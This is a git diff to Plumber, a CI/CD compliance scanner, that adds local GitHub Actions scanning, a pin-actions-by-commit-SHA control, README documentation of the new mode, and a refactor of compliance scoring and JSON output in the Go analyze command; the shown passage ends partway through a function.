diff --git a/.plumber.yaml b/.plumber.yaml
index 75d039f..7275691 100644
--- a/.plumber.yaml
+++ b/.plumber.yaml
@@ -547,4 +547,44 @@ controls:
# When true, also flags insecure daemon configuration
# (DOCKER_TLS_CERTDIR="" or DOCKER_HOST tcp://...:2375)
# in jobs that use a DinD service.
- detectInsecureDaemon: true
\ No newline at end of file
+ detectInsecureDaemon: true
+
+ # ===========================================
+ # Actions must be pinned by commit SHA (GitHub Actions only)
+ # ===========================================
+ # Flags workflow steps whose `uses:` reference is not a 40-character
+ # commit SHA. Tag/branch refs (v4, main) are mutable: if the action's
+ # maintainer is compromised, or retags a release, the caller workflow
+ # silently runs new code with its secrets. This is the vector behind
+ # the March 2025 tj-actions/changed-files compromise (CVE-2025-30066).
+ #
+ # Enabled by default: pin-by-SHA is the single highest-value
+ # supply-chain control on GitHub Actions, and the default
+ # trustedOwners list exempts first-party (`actions/*`, `github/*`)
+ # actions so the initial signal on a fresh repo stays focused on
+ # the third-party surface. Pair with Dependabot
+ # (`version-update-strategy: sha-and-version`) to keep pins fresh.
+ # Disable (`enabled: false`) if the project is not yet ready to
+ # migrate off tag pins β the other 29 rules remain active.
+ actionsMustBePinnedByCommitSha:
+ enabled: true
+
+ # Action-owner prefixes exempt from the pin-by-SHA requirement.
+ # Only list owners already inside the workflow's trust boundary.
+ # "actions" and "github" cover the first-party GitHub-owned
+ # actions the runtime trusts implicitly; anything else re-opens
+ # the supply-chain risk this check exists to close.
+ trustedOwners:
+ - actions
+ - github
+
+# ===========================================
+# Engine β experimental Rego/OPA rule engine
+# ===========================================
+# Opt-in, off by default. When enabled, Plumber will evaluate the
+# multi-provider Rego policies. The engine runs in shadow mode
+# alongside the legacy Go controls until they are removed β see
+# docs/REFACTOR_MULTI_PROVIDER.md Β§8 (Phase A).
+engine:
+ # Turn the Rego/OPA engine on. Default: true.
+ enabled: true
\ No newline at end of file
diff --git a/README.md b/README.md
index c5f4c79..b5e3bc2 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,8 @@
- CI/CD compliance scanner for GitLab pipelines
+ CI/CD compliance scanner for GitLab pipelines
+ Also scans GitHub Actions workflows locally when origin is GitHub (no API token).
@@ -36,7 +37,7 @@
## π€ What is Plumber?
-Plumber is a compliance scanner for GitLab. It reads your `.gitlab-ci.yml` and repository settings, then checks for security and compliance issues like:
+Plumber is a compliance scanner for CI/CD. On **GitLab**, it reads your `.gitlab-ci.yml` (and related includes) and repository settings via the API. On **GitHub**, when you run it from a clone whose `origin` points at GitHub and you do not pass `--gitlab-url` / `--project`, it scans **local** `.github/workflows/*.{yml,yaml}` with the same Rego policy engine (no GitHub API call, no token). It checks for issues like:
- Container images using mutable tags (`latest`, `dev`)
- Container images from untrusted registries
@@ -50,7 +51,7 @@ Plumber is a compliance scanner for GitLab. It reads your `.gitlab-ci.yml` and r
- Weakened security jobs (`allow_failure: true`, `when: manual`, `rules: [{when: never}]`) on SAST, Secret Detection, and other scanners (OWASP CICD-SEC-4)
- Docker-in-Docker (dind) services enabling container escape on shared runners
-**How does it work?** Plumber connects to your GitLab instance via API, analyzes your pipeline configuration, and reports any issues it finds. You define what's allowed in a config file (`.plumber.yaml`), and Plumber tells you if your project complies. When running locally from your git repo, Plumber uses your **local CI configuration file** (`.gitlab-ci.yml` by default, or a [custom path](#custom-ci-configuration-file-path)) allowing you to validate changes before pushing.
+**How does it work?** On GitLab, Plumber connects via API, analyzes your pipeline configuration, and reports issues. You define what's allowed in `.plumber.yaml`. When your local clone is the analyzed project, Plumber can use your **local** `.gitlab-ci.yml` (or a [custom path](#custom-ci-configuration-file-path)) so you can validate before push. On the **GitHub local** path, analysis is offline from workflow files only; compliance is **binary** (any finding fails the run) until per-control percentage parity lands; `--threshold` does not gate pass/fail yet. **`GITLAB_TOKEN` is only required for the GitLab API path.** To analyze GitLab while standing in a GitHub clone, pass `--gitlab-url` and `--project` explicitly (that forces the GitLab analyzer).
@@ -73,6 +74,7 @@ Choose **one** of these methods. You don't need both:
- [CLI](#option-1-cli)
- [GitLab CI Component](#option-2-gitlab-ci-component)
- [Configuration](#%EF%B8%8F-configuration)
+ - [Multi-provider configuration (roadmap)](#multi-provider-configuration-roadmap)
- [Available Controls](#available-controls)
- [Artifacts & Outputs](#-artifacts--outputs)
- [JSON Report](#json-report)
@@ -323,9 +325,24 @@ Flags:
This creates `.plumber.yaml` with sensible [defaults](./.plumber.yaml). Customize it to fit your needs.
+### Multi-provider configuration (roadmap)
+
+Plumber already uses a **single** root file (`.plumber.yaml`) with a shared `controls:` map and an optional `engine:` section (see the repo [`.plumber.yaml`](./.plumber.yaml)). **GitLab** and **GitHub** policies today draw from that surface where codes overlap; GitHub-only checks use issue codes that map through the same registry.
+
+**Near term (minimal churn):** keep one file. Prefer documenting provider-specific knobs inline next to each control (as today) until GitHub reaches feature parity with GitLab for reporting (threshold, PBOM, MR/badge).
+
+**When GitLab and GitHub diverge more clearly**, choose one of:
+
+| Approach | Pros | Cons |
+|----------|------|------|
+| **Single file, nested keys** (e.g. `controls.foo.gitlab` / `controls.foo.github` or `providers.gitlab` / `providers.github`) | One place to review policy | Larger schema; loader must merge defaults carefully |
+| **Split files** (e.g. `.plumber.yaml` + `.plumber.github.yaml`, or `include:` from the main file) | Clear ownership per platform | Extra paths to document and validate in CI |
+
+**Recommendation for later:** add optional includes first (`extends` / `include` list in YAML), then introduce nested overrides only where one control truly differs by platform. That avoids breaking existing repos that rely on the flat `controls` keys.
+
### Available Controls
-Plumber includes 14 compliance controls. Each can be enabled/disabled and customized in [.plumber.yaml](.plumber.yaml):
+Plumber documents **14** primary GitLab-oriented controls in this section (the defaults in [`.plumber.yaml`](./.plumber.yaml)); Rego also enforces **additional GitHub-specific issue codes** when you run the local GitHub Actions path. See the codebase issue registry and [docs](docs/) for the full code list. Each can be enabled/disabled and customized in [.plumber.yaml](.plumber.yaml):
1. Container images must not use forbidden tags
@@ -903,10 +920,10 @@ brew install plumber
To install a specific version:
```bash
-brew install getplumber/plumber/plumber@1
+brew install getplumber/plumber/plumber@0.2.7
```
-> **Note:** Versioned formulas are keg-only. Use the full path for example `/usr/local/opt/plumber@0.2.21/bin/plumber` or run `brew link plumber@0.2.21` to add it to your PATH.
+> **Note:** Versioned formulas are keg-only. Use the full path for example `/usr/local/opt/plumber@0.2.7/bin/plumber` or run `brew link plumber@0.2.7` to add it to your PATH.
### Mise
@@ -1028,7 +1045,14 @@ make build # or make install to build and copy to /usr/local/bin/
### `plumber analyze`
-Run compliance analysis on a GitLab project.
+Runs the compliance analyzer. **Behavior depends on the git remote (and flags):**
+
+| Mode | When | What runs |
+|------|------|-----------|
+| **GitLab** | `origin` is a GitLab host, or you pass `--gitlab-url` and `--project` | Fetches CI config and project data via the GitLab API (requires `GITLAB_TOKEN`). Uses per-control compliance and `--threshold`. |
+| **GitHub (local)** | `origin` is GitHub **and** you do **not** set `--gitlab-url` or `--project` | Reads `.github/workflows/*.{yml,yaml}` from the repo root only; **no** API token. Pass/fail is **any finding** (binary) for now; **`--threshold` does not** change exit code. **`--pbom` / `--pbom-cyclonedx`**, **`--mr-comment`**, and **`--badge`** are GitLab-only today. |
+
+To **force GitLab** analysis from a machine that has a GitHub `origin` (e.g. a fork), set `--gitlab-url` and `--project` explicitly.
```bash
plumber analyze [flags]
@@ -1041,11 +1065,11 @@ plumber analyze [flags]
| `--gitlab-url` | No* | auto-detect | GitLab instance URL |
| `--project` | No* | auto-detect | Project path (e.g., `group/project`) |
| `--config` | No | `.plumber.yaml` | Path to config file |
-| `--threshold` | No | `100` | Minimum compliance % to pass (0-100) |
-| `--branch` | No | default | Branch to analyze |
+| `--threshold` | No | `100` | Minimum compliance % to pass (0-100). **Gates exit code on the GitLab path only** (not the GitHub local path yet). |
+| `--branch` | No | default | Branch to analyze (GitLab API path; informational on GitHub local scan) |
| `--output` | No | β | Write JSON results to file |
-| `--pbom` | No | β | Write PBOM (Pipeline Bill of Materials) to file |
-| `--pbom-cyclonedx` | No | β | Write PBOM in CycloneDX SBOM format |
+| `--pbom` | No | β | Write PBOM (Pipeline Bill of Materials) to file (**GitLab path**; ignored on GitHub local scan) |
+| `--pbom-cyclonedx` | No | β | Write PBOM in CycloneDX SBOM format (**GitLab path**; ignored on GitHub local scan) |
| `--print` | No | `true` | Print text output to stdout |
| `--mr-comment` | No | `false` | Post/update a compliance comment on the merge request (MR pipelines only: requires `api` scope) |
| `--badge` | No | `false` | Create/update a Plumber compliance badge on the project (requires `api` scope; only runs on default branch) |
@@ -1065,7 +1089,7 @@ plumber analyze [flags]
| Variable | Required | Description |
|----------|----------|-------------|
-| `GITLAB_TOKEN` | Yes | GitLab API token with `read_api` + `read_repository` scopes (from a Maintainer or higher). Use `api` scope instead if `--mr-comment` or `--badge` is enabled. |
+| `GITLAB_TOKEN` | **Yes** for the **GitLab API** path | GitLab API token with `read_api` + `read_repository` scopes (Maintainer or higher). Use `api` scope instead if `--mr-comment` or `--badge` is enabled. **Not used** on the GitHub local workflow scan. |
| `PLUMBER_NO_UPDATE_CHECK` | No | Set to any value (e.g., `1`) to disable the automatic version check. |
### Automatic Version Check
@@ -1086,9 +1110,9 @@ export PLUMBER_NO_UPDATE_CHECK=1
| Exit Code | Meaning |
|-----------|----------|
-| `0` | Analysis passed (compliance β₯ threshold) |
-| `1` | Compliance failure (compliance < threshold) |
-| `2` | Runtime error (config error, network failure, missing token, etc.) |
+| `0` | Analysis passed: GitLab path β compliance β₯ threshold; GitHub local path β **no** findings |
+| `1` | Compliance failure: GitLab β compliance below `--threshold`; GitHub local β one or more findings |
+| `2` | Runtime error (config error, network failure, missing token on GitLab path, etc.) |
### `plumber config init`
diff --git a/cmd/analyze.go b/cmd/analyze.go
index e35d046..4fc1b59 100644
--- a/cmd/analyze.go
+++ b/cmd/analyze.go
@@ -1,6 +1,7 @@
package cmd
import (
+ "bytes"
"encoding/json"
"fmt"
"os"
@@ -8,6 +9,9 @@ import (
"strings"
"unicode/utf8"
+ "github.com/charmbracelet/lipgloss"
+ "github.com/charmbracelet/lipgloss/table"
+ "github.com/getplumber/plumber/collector"
"github.com/getplumber/plumber/configuration"
"github.com/getplumber/plumber/control"
glabCI "github.com/getplumber/plumber/gitlab"
@@ -30,8 +34,8 @@ var (
pbomCycloneDXFile string
mrComment bool
badge bool
- showScore bool
- showScorePoint bool
+ showScore bool
+ showScorePoint bool
controlsFilter string
skipControls string
ciConfigPath string
@@ -39,19 +43,18 @@ var (
var analyzeCmd = &cobra.Command{
Use: "analyze",
- Short: "Analyze a GitLab project's CI/CD pipeline",
+ Short: "Analyze CI/CD configuration (GitLab via API, or local GitHub Actions when origin is GitHub)",
SilenceUsage: true, // Don't print usage on errors (e.g., threshold failures)
- Long: `Analyze a GitLab project's CI/CD pipeline for compliance issues.
+ Long: `Analyze CI/CD configuration for compliance issues.
-This command connects to a GitLab instance, retrieves the project's CI/CD
-configuration, and runs various checks including:
-- Pipeline origin analysis (components, templates, local files)
-- Pipeline image analysis (registries, tags)
-- Mutable image tag detection
-- Image digest pinning enforcement
+GitLab path (when the git remote is GitLab, or when you pass --gitlab-url and --project):
+ Connects to GitLab, retrieves CI/CD configuration and project settings, and runs
+ checks including pipeline origins, images, tags, and branch protection.
+ Required environment variable: GITLAB_TOKEN
-Required environment variables:
- GITLAB_TOKEN GitLab API token (required)
+GitHub path (when origin is GitHub and --gitlab-url / --project are not set):
+ Scans local .github/workflows only (Rego). No GitLab token. Some flags apply only
+ to the GitLab API path (see README).
Flags (auto-detected from git remote if not specified):
--gitlab-url GitLab instance URL (auto-detected from git remote)
@@ -149,6 +152,19 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
gitRemoteURL = remoteInfo.URL
gitRemoteProjectPath = remoteInfo.ProjectPath
+ // Multi-provider dispatch: GitHub projects take the Rego-only,
+ // local-file path. GitLab (and self-hosted) continue to use the
+ // full legacy analyzer below.
+ //
+ // Explicit --gitlab-url / --project flags always win over
+ // auto-detection: a user inside a GitHub clone may legitimately
+ // want to analyse a GitLab project they passed by hand
+ // (cross-checks, demos, scripted regression runs). Only
+ // dispatch to the GitHub path when the caller did not override.
+ if remoteInfo.Provider == "github" && !gitlabURLFromFlag && !projectFromFlag {
+ return runGitHubAnalyze(cmd, remoteInfo)
+ }
+
if !gitlabURLFromFlag {
gitlabURL = remoteInfo.URL
fmt.Fprintf(os.Stderr, "Auto-detected GitLab URL: %s\n", gitlabURL)
@@ -268,85 +284,42 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
return fmt.Errorf("analysis failed: %w", err)
}
- // Calculate overall compliance (average of all enabled controls)
- var complianceSum float64 = 0
+ // Overall compliance is the share of enabled controls that emitted
+ // no finding. One control = one unit, regardless of how many
+ // findings it produces. Skipped controls are excluded from both
+ // sides of the ratio so disabling a control does not change the
+ // score. When no controls are enabled the score falls back to 0 β
+ // same semantic as the legacy averaging loop: if nothing can be
+ // verified, nothing can be trusted.
+ //
+ // A missing or invalid CI configuration short-circuits to 0:
+ // the absence of findings under those conditions is evidence that
+ // nothing could be analysed, not that the project is compliant.
+ // Without this guard a project with no .gitlab-ci.yml or a
+ // syntactically broken one would score 100% β letting attackers
+ // pass the gate by deleting or breaking the CI file.
+ compliance := 0.0
controlCount := 0
-
- if result.ImageForbiddenTagsResult != nil && !result.ImageForbiddenTagsResult.Skipped {
- complianceSum += result.ImageForbiddenTagsResult.Compliance
- controlCount++
- }
-
- if result.ImageAuthorizedSourcesResult != nil && !result.ImageAuthorizedSourcesResult.Skipped {
- complianceSum += result.ImageAuthorizedSourcesResult.Compliance
- controlCount++
- }
-
- if result.BranchProtectionResult != nil && !result.BranchProtectionResult.Skipped {
- complianceSum += result.BranchProtectionResult.Compliance
- controlCount++
- }
-
- if result.HardcodedJobsResult != nil && !result.HardcodedJobsResult.Skipped {
- complianceSum += result.HardcodedJobsResult.Compliance
- controlCount++
- }
-
- if result.OutdatedIncludesResult != nil && !result.OutdatedIncludesResult.Skipped {
- complianceSum += result.OutdatedIncludesResult.Compliance
- controlCount++
- }
-
- if result.ForbiddenVersionsIncludesResult != nil && !result.ForbiddenVersionsIncludesResult.Skipped {
- complianceSum += result.ForbiddenVersionsIncludesResult.Compliance
- controlCount++
- }
-
- if result.RequiredComponentsResult != nil && !result.RequiredComponentsResult.Skipped {
- complianceSum += result.RequiredComponentsResult.Compliance
- controlCount++
- }
-
- if result.RequiredTemplatesResult != nil && !result.RequiredTemplatesResult.Skipped {
- complianceSum += result.RequiredTemplatesResult.Compliance
- controlCount++
- }
-
- if result.DebugTraceResult != nil && !result.DebugTraceResult.Skipped {
- complianceSum += result.DebugTraceResult.Compliance
- controlCount++
- }
-
- if result.VariableInjectionResult != nil && !result.VariableInjectionResult.Skipped {
- complianceSum += result.VariableInjectionResult.Compliance
- controlCount++
- }
-
- if result.SecurityJobsWeakenedResult != nil && !result.SecurityJobsWeakenedResult.Skipped {
- complianceSum += result.SecurityJobsWeakenedResult.Compliance
- controlCount++
- }
-
- if result.UnverifiedScriptsResult != nil && !result.UnverifiedScriptsResult.Skipped {
- complianceSum += result.UnverifiedScriptsResult.Compliance
- controlCount++
- }
-
- if result.JobVariablesOverrideResult != nil && !result.JobVariablesOverrideResult.Skipped {
- complianceSum += result.JobVariablesOverrideResult.Compliance
- controlCount++
- }
-
- if result.DockerInDockerResult != nil && !result.DockerInDockerResult.Skipped {
- complianceSum += result.DockerInDockerResult.Compliance
- controlCount++
- }
-
- // Calculate average compliance
- // If no controls ran (e.g., data collection failed), compliance is 0% - we can't verify anything
- var compliance float64 = 0
- if controlCount > 0 {
- compliance = complianceSum / float64(controlCount)
+ if !result.CiMissing && result.CiValid {
+ findingCountsByControl := map[string]int{}
+ for _, f := range result.Findings {
+ if info := control.LookupCode(control.ErrorCode(f.Code)); info != nil {
+ findingCountsByControl[info.ControlName]++
+ }
+ }
+ passed := 0
+ for _, e := range control.GitLabControls(conf.PlumberConfig) {
+ if e.Skipped {
+ continue
+ }
+ controlCount++
+ if findingCountsByControl[e.ControlName] == 0 {
+ passed++
+ }
+ }
+ if controlCount > 0 {
+ compliance = float64(passed) * 100.0 / float64(controlCount)
+ }
}
var scoreResult *control.PlumberScoreResult
@@ -358,14 +331,14 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
// Print text output to stdout if enabled
if printOutput {
- if err := outputText(result, threshold, compliance, controlCount, scoreResult, scoreMode, scorePointMode); err != nil {
+ if err := outputText(result, conf.PlumberConfig, threshold, compliance, controlCount, scoreResult, scoreMode, scorePointMode); err != nil {
return err
}
}
// Write JSON to file if specified
if outputFile != "" {
- if err := writeJSONToFile(result, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
+ if err := writeJSONToFile(result, conf.PlumberConfig, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
return err
}
fmt.Fprintf(os.Stderr, "Results written to: %s\n", outputFile)
@@ -391,7 +364,7 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
if mrComment {
if mrIID := glabCI.DetectMergeRequestIID(); mrIID != 0 {
fmt.Fprintf(os.Stderr, "Merge request pipeline detected (MR !%d), posting compliance comment...\n", mrIID)
- if err := control.ManageMergeRequestComment(result.ProjectID, mrIID, result, compliance, threshold, conf, scoreResult, scoreMode, scorePointMode); err != nil {
+ if err := control.ManageMergeRequestComment(result.ProjectID, mrIID, result, conf.PlumberConfig, compliance, threshold, conf, scoreResult, scoreMode, scorePointMode); err != nil {
// Log but don't fail the analysis for a comment error
fmt.Fprintf(os.Stderr, "Warning: failed to post merge request comment: %v\n", err)
} else {
@@ -513,35 +486,146 @@ func parseControlsFilter(raw string) ([]string, error) {
return controls, nil
}
-func writeJSONToFile(result *control.AnalysisResult, threshold, compliance float64, filePath string, score *control.PlumberScoreResult, scoreMode bool) error {
- // Create output with threshold info
- output := struct {
- *control.AnalysisResult
- Threshold float64 `json:"threshold"`
- Compliance float64 `json:"compliance"`
- Passed bool `json:"passed"`
- PlumberScore *control.PlumberScoreResult `json:"plumberScore,omitempty"`
- }{
- AnalysisResult: result,
- Threshold: threshold,
- Compliance: compliance,
- Passed: compliance >= threshold,
+func writeJSONToFile(result *control.AnalysisResult, pc *configuration.PlumberConfig, threshold, compliance float64, filePath string, score *control.PlumberScoreResult, scoreMode bool) error {
+ // Marshal AnalysisResult into a generic map so the per-control
+ // `*Result` legacy blocks can sit alongside its existing fields
+ // without forcing every consumer to follow the dev's flat-findings
+ // shape. The legacy keys (imageForbiddenTagsResult, β¦) carry the
+ // same issues + metrics + compliance triplet v0.2.x emitted, so
+ // downstream tooling parses the dev output unchanged.
+ raw, err := json.Marshal(result)
+ if err != nil {
+ return fmt.Errorf("marshal result: %w", err)
+ }
+ output := map[string]any{}
+ if err := json.Unmarshal(raw, &output); err != nil {
+ return fmt.Errorf("unmarshal result: %w", err)
}
+ output["threshold"] = threshold
+ output["compliance"] = compliance
+ output["passed"] = compliance >= threshold
if scoreMode && score != nil {
- s := *score
- output.PlumberScore = &s
+ output["plumberScore"] = score
}
+ for k, v := range legacyResultsByName(result, pc) {
+ output[k] = v
+ }
+ // Drop the flat Rego findings list from the file: consumers should use
+ // the per-control *Result blocks (issues/metrics/compliance), matching
+ // the preβflat-findings JSON shape.
+ delete(output, "findings")
- // Create/overwrite the file
- file, err := os.Create(filePath)
+ // Encode with intentional key order so readers see project/context first,
+ // scoring next, then per-control *Result blocks (not Go map lexical order).
+ payload, err := marshalLegacyAnalysisJSONObject(output)
if err != nil {
+ return fmt.Errorf("marshal ordered analysis JSON: %w", err)
+ }
+ if err := os.WriteFile(filePath, payload, 0o644); err != nil {
return fmt.Errorf("failed to create output file: %w", err)
}
- defer func() { _ = file.Close() }()
+ return nil
+}
- encoder := json.NewEncoder(file)
- encoder.SetIndent("", " ")
- return encoder.Encode(output)
+// analysisJSONLegacyKeyHead is the canonical top-level key order before any
+// *Result control blocks so analysis.json reads: project β CI context β
+// outcome/score β findings (per-control).
+var analysisJSONLegacyKeyHead = []string{
+ "projectPath", "projectId", "defaultBranch",
+ "ciConfigSource", "ciValid", "ciMissing", "ciErrors",
+ "pipelineOriginMetrics", "pipelineImageMetrics",
+ "compliance", "threshold", "passed", "plumberScore",
+}
+
+func legacyAnalysisJSONKeyOrder(m map[string]any) []string {
+ seen := make(map[string]bool, len(m))
+ order := make([]string, 0, len(m))
+ for _, k := range analysisJSONLegacyKeyHead {
+ if _, ok := m[k]; ok {
+ order = append(order, k)
+ seen[k] = true
+ }
+ }
+ var suffixResult []string
+ for k := range m {
+ if seen[k] {
+ continue
+ }
+ if strings.HasSuffix(k, "Result") {
+ suffixResult = append(suffixResult, k)
+ }
+ }
+ sort.Strings(suffixResult)
+ for _, k := range suffixResult {
+ order = append(order, k)
+ seen[k] = true
+ }
+ var rest []string
+ for k := range m {
+ if !seen[k] {
+ rest = append(rest, k)
+ }
+ }
+ sort.Strings(rest)
+ order = append(order, rest...)
+ return order
+}
+
+func marshalLegacyAnalysisJSONObject(output map[string]any) ([]byte, error) {
+ keys := legacyAnalysisJSONKeyOrder(output)
+ step := " "
+ var buf bytes.Buffer
+ buf.WriteString("{\n")
+ first := true
+ for _, k := range keys {
+ v, ok := output[k]
+ if !ok {
+ continue
+ }
+ if !first {
+ buf.WriteString(",\n")
+ }
+ first = false
+
+ keyBytes, err := json.Marshal(k)
+ if err != nil {
+ return nil, fmt.Errorf("key %s: %w", k, err)
+ }
+ rawVal, err := json.Marshal(v)
+ if err != nil {
+ return nil, fmt.Errorf("%s value: %w", k, err)
+ }
+
+ buf.WriteString(step)
+ buf.Write(keyBytes)
+ buf.WriteString(": ")
+ if len(rawVal) > 0 && (rawVal[0] == '{' || rawVal[0] == '[') {
+ rawIndented, err := json.MarshalIndent(v, "", step)
+ if err != nil {
+ return nil, fmt.Errorf("%s indentation: %w", k, err)
+ }
+ trimmed := bytes.TrimSpace(rawIndented)
+ lines := bytes.Split(trimmed, []byte("\n"))
+ if len(lines) == 1 {
+ buf.Write(lines[0])
+ continue
+ }
+ // Opening bracket on the same line as the key; body lines indented.
+ buf.Write(lines[0])
+ buf.WriteByte('\n')
+ for i := 1; i < len(lines)-1; i++ {
+ buf.WriteString(step)
+ buf.Write(lines[i])
+ buf.WriteByte('\n')
+ }
+ buf.WriteString(step)
+ buf.Write(lines[len(lines)-1])
+ continue
+ }
+ buf.Write(rawVal)
+ }
+ buf.WriteString("\n}\n")
+ return buf.Bytes(), nil
}
// buildImageComplianceData extracts compliance results into a lookup map for the PBOM generator
@@ -550,57 +634,63 @@ func buildImageComplianceData(result *control.AnalysisResult) *pbom.ImageComplia
ForbiddenTagImages: make(map[string]bool),
UnauthorizedImages: make(map[string]bool),
}
-
- // Build set of images with forbidden tags from control results
- if result.ImageForbiddenTagsResult != nil && !result.ImageForbiddenTagsResult.Skipped {
- // Mark all images as NOT having forbidden tags first
- if result.PipelineImageData != nil {
- for _, img := range result.PipelineImageData.Images {
- data.ForbiddenTagImages[img.Link] = false
- }
- }
- // Then mark the ones that do
- for _, issue := range result.ImageForbiddenTagsResult.Issues {
- data.ForbiddenTagImages[issue.Link] = true
- }
+ if result.PipelineImageData == nil {
+ return data
}
-
- // Build set of unauthorized images from control results
- if result.ImageAuthorizedSourcesResult != nil && !result.ImageAuthorizedSourcesResult.Skipped {
- // Mark all images as authorized first
- if result.PipelineImageData != nil {
- for _, img := range result.PipelineImageData.Images {
- data.UnauthorizedImages[img.Link] = false
- }
+ imagesByJob := make(map[string]string, len(result.PipelineImageData.Images))
+ for _, img := range result.PipelineImageData.Images {
+ imagesByJob[img.Job] = img.Link
+ data.ForbiddenTagImages[img.Link] = false
+ data.UnauthorizedImages[img.Link] = false
+ }
+ // Flip flags based on Rego findings. Image-pinning codes
+ // (ISSUE-102/103) mark forbidden-tag; ISSUE-101 marks unauthorized.
+ for _, f := range result.Findings {
+ link, ok := imagesByJob[f.Job]
+ if !ok {
+ continue
}
- // Then mark the ones that aren't
- for _, issue := range result.ImageAuthorizedSourcesResult.Issues {
- data.UnauthorizedImages[issue.Link] = true
+ switch control.ErrorCode(f.Code) {
+ case control.CodeImageForbiddenTag, control.CodeImageNotPinnedByDigest:
+ data.ForbiddenTagImages[link] = true
+ case control.CodeImageUnauthorizedSource:
+ data.UnauthorizedImages[link] = true
}
}
-
return data
}
// buildIncludeOverrideData extracts override detection results into a lookup map for the PBOM generator.
-// Keys are clean include paths (without version/instance prefix).
+// Keys are clean include paths (without version/instance prefix). The data
+// now comes directly from the collector-enriched IR that the Rego engine
+// already uses β no dependency on the legacy Go controls.
func buildIncludeOverrideData(result *control.AnalysisResult) *pbom.IncludeOverrideData {
data := &pbom.IncludeOverrideData{
Overrides: make(map[string][]utils.OverriddenJobDetail),
}
-
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped {
- for _, issue := range r.OverriddenIssues {
- data.Overrides[issue.ComponentPath] = issue.OverriddenJobs
- }
+ if result.PipelineOriginData == nil {
+ return data
}
-
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped {
- for _, issue := range r.OverriddenIssues {
- data.Overrides[issue.TemplatePath] = issue.OverriddenJobs
+ for idx := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[idx]
+ location := o.GitlabIncludeOrigin.Location
+ if location == "" {
+ location = o.GitlabComponent.ComponentIncludePath
+ }
+ if location == "" {
+ continue
}
+ key := utils.CleanOriginPath(location)
+ irJobs := collector.CollectOverriddenJobs(o, result.PipelineOriginData)
+ if len(irJobs) == 0 {
+ continue
+ }
+ details := make([]utils.OverriddenJobDetail, 0, len(irJobs))
+ for _, j := range irJobs {
+ details = append(details, utils.OverriddenJobDetail{JobName: j.Name, OverriddenKeys: j.Keys})
+ }
+ data.Overrides[key] = details
}
-
return data
}
@@ -849,646 +939,109 @@ func sortControlSummariesForIssuesTable(s []controlSummary) {
})
}
+// printBanner renders the Plumber ASCII-art banner followed by the
+// tagline and community link. The banner keeps Plumber's signature
+// green color for brand recognition.
func printBanner() {
- fmt.Printf("\n")
- fmt.Printf("%s", colorGreenBright)
- fmt.Printf(" βββββββ βββ βββ βββ ββββ βββββββββββ βββββββββββββββ \n")
- fmt.Printf(" βββββββββββ βββ βββ βββββ βββββββββββββββββββββββββββββ\n")
- fmt.Printf(" βββββββββββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n")
- fmt.Printf(" βββββββ βββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n")
- fmt.Printf(" βββ βββββββββββββββββ βββ βββ ββββββββββββββββββββββ βββ\n")
- fmt.Printf(" βββ ββββββββ βββββββ βββ ββββββββββ βββββββββββ βββ\n")
- fmt.Printf("%s", colorReset)
- fmt.Printf(" %sCI/CD Compliance Scanner for GitLab Pipelines%s\n", colorBold, colorReset)
- fmt.Printf(" %sJoin our community: %shttps://getplumber.io/discord%s\n\n", colorDim, colorCyan, colorReset)
+ asciiArt := lipgloss.NewStyle().Foreground(colPass).Bold(true).Render(
+ " βββββββ βββ βββ βββ ββββ βββββββββββ βββββββββββββββ \n" +
+ " βββββββββββ βββ βββ βββββ βββββββββββββββββββββββββββββ\n" +
+ " βββββββββββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n" +
+ " βββββββ βββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n" +
+ " βββ βββββββββββββββββ βββ βββ ββββββββββββββββββββββ βββ\n" +
+ " βββ ββββββββ βββββββ βββ ββββββββββ βββββββββββ βββ",
+ )
+ fmt.Println()
+ fmt.Println(asciiArt)
+ fmt.Printf(" %s %s\n",
+ styleTitle.Render("CI/CD Compliance Scanner for GitLab & GitHub Actions"),
+ styleMuted.Render("v"+Version),
+ )
+ fmt.Printf(" %s %s\n\n",
+ styleMuted.Render("Join our community:"),
+ styleAccent.Render("https://getplumber.io/discord"),
+ )
}
-func outputText(result *control.AnalysisResult, threshold, compliance float64, controlCount int, score *control.PlumberScoreResult, scoreMode, scorePointMode bool) error {
+func outputText(result *control.AnalysisResult, pc *configuration.PlumberConfig, threshold, compliance float64, controlCount int, score *control.PlumberScoreResult, scoreMode, scorePointMode bool) error {
// Collect control summaries for tables
var controls []controlSummary
// Header
- fmt.Printf("\n%sProject: %s%s\n\n", colorBold, result.ProjectPath, colorReset)
+ fmt.Printf("\n%s %s\n\n", styleTitle.Render("Project:"), result.ProjectPath)
// Warning if no controls could be evaluated
if controlCount == 0 {
- fmt.Printf(" %sβ WARNING: No controls could be evaluated!%s\n", colorRed, colorReset)
+ fmt.Printf(" %s\n", styleError.Render("β WARNING: No controls could be evaluated!"))
if len(result.CiErrors) > 0 {
- fmt.Printf(" %sCI configuration errors:%s\n", colorRed, colorReset)
+ fmt.Printf(" %s\n", styleError.Render("CI configuration errors:"))
+ bullet := styleError.Render("β’")
for _, e := range result.CiErrors {
- fmt.Printf(" %sβ’%s %s\n", colorRed, colorReset, e)
+ fmt.Printf(" %s %s\n", bullet, e)
}
fmt.Println()
} else if result.CiMissing {
- fmt.Printf(" %sCI configuration file is missing from the project.%s\n\n", colorDim, colorReset)
+ fmt.Printf(" %s\n\n", styleDim.Render("CI configuration file is missing from the project."))
} else {
- fmt.Printf(" %sData collection failed - compliance defaults to 0%%.%s\n", colorDim, colorReset)
- fmt.Printf(" %sUse --verbose for more info.%s\n\n", colorDim, colorReset)
+ fmt.Printf(" %s\n", styleDim.Render("Data collection failed - compliance defaults to 0%."))
+ fmt.Printf(" %s\n\n", styleDim.Render("Use --verbose for more info."))
}
}
// CI config source info
if result.CIConfigSource == "local" {
- fmt.Printf(" %sCI Config Source: local file%s\n\n", colorCyan, colorReset)
- }
-
- // Control 1: Container images must not use forbidden tags
- if result.ImageForbiddenTagsResult != nil {
